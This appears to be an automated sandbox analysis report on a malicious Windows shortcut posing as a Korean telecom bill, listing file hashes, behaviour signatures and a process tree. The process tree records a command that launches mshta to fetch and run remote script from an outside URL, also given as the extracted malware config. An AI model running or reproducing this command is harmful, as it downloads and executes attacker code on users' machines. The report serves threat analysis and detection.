Analysis

max time kernel: 144s
max time network: 148s
platform: windows7_x64
resource: win7-20230220-en
resource tags: arch:x64, arch:x86, image:win7-20230220-en, locale:en-us, os:windows7-x64, system
submitted: 21-03-2023 23:32
Behavioral tasks

Task           Sample                                           Resource
behavioral1    LG์ ํ๋ฌ์ค_์ด๋ํต์ _202208_์ด_์ .html        win7-20230220-en
behavioral2    LG์ ํ๋ฌ์ค_์ด๋ํต์ _202208_์ด_์ .html        win10v2004-20230220-en
behavioral3    LG์ ํ๋ฌ์ค_์ด๋ํต์ _202208_์ด_์ .html.lnk    win7-20230220-en
behavioral4    LG์ ํ๋ฌ์ค_์ด๋ํต์ _202208_์ด_์ .html.lnk    win10v2004-20230220-en
behavioral5    MAIL_20230125151802.chm                          win7-20230220-en
behavioral6    MAIL_20230125151802.chm                          win10v2004-20230221-en
behavioral7    Message.chm                                      win7-20230220-en
behavioral8    Message.chm                                      win10v2004-20230220-en
behavioral9    Message.chm                                      win7-20230220-en
behavioral10   Message.chm                                      win10v2004-20230220-en
General

Target: LG์ ํ๋ฌ์ค_์ด๋ํต์ _202208_์ด_์ .html.lnk
Size: 1KB
MD5: eb7a6e3dc8bbc26f208c511ec7ee1d4c
SHA1: b259d84f43f10a00edf1eca1c48610490e0aeb4c
SHA256: 7c248e03cf87ea3d9a207b17925b7fd8998e9a0b462e601d178ff4c1cd9a1708
SHA512: b583bf4cd0b31b9961a268cacd1d05c104886487960c03924c3ba07c33aa56743ed9c3d30bc0191c501db5214360612ae0c8721690001fc8a459c06609dc7227

Malware Config

Extracted: http://attiferstudio.com/install.bak/sony/3.html
Signatures

Blocklisted process makes network request (1 IoC)
Processes:
  flow   pid    process
  4      1752   mshta.exe

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Modifies Internet Explorer settings (1 IoC)
Processes:
  description   ioc                                                                                                      process
  Key created   \REGISTRY\USER\S-1-5-21-1283023626-844874658-3193756055-1000\Software\Microsoft\Internet Explorer\Main    mshta.exe

Suspicious use of WriteProcessMemory (6 IoCs)
Processes:
  description                         pid    process   target process
  PID 1584 wrote to memory of 364     1584   cmd.exe   cmd.exe
  PID 1584 wrote to memory of 364     1584   cmd.exe   cmd.exe
  PID 1584 wrote to memory of 364     1584   cmd.exe   cmd.exe
  PID 364 wrote to memory of 1752     364    cmd.exe   mshta.exe
  PID 364 wrote to memory of 1752     364    cmd.exe   mshta.exe
  PID 364 wrote to memory of 1752     364    cmd.exe   mshta.exe
Processes

1. C:\Windows\system32\cmd.exe
   Command line: cmd /c C:\Users\Admin\AppData\Local\Temp\LG์ ํ๋ฌ์ค_์ด๋ํต์ _202208_์ด_์ .html.lnk
   - Suspicious use of WriteProcessMemory

   2. C:\Windows\System32\cmd.exe
      Command line: "C:\Windows\System32\cmd.exe" /c start mshta http://attiferstudio.com/install.bak/sony/3.html
      - Suspicious use of WriteProcessMemory

      3. C:\Windows\system32\mshta.exe
         Command line: mshta http://attiferstudio.com/install.bak/sony/3.html
         - Blocklisted process makes network request
         - Modifies Internet Explorer settings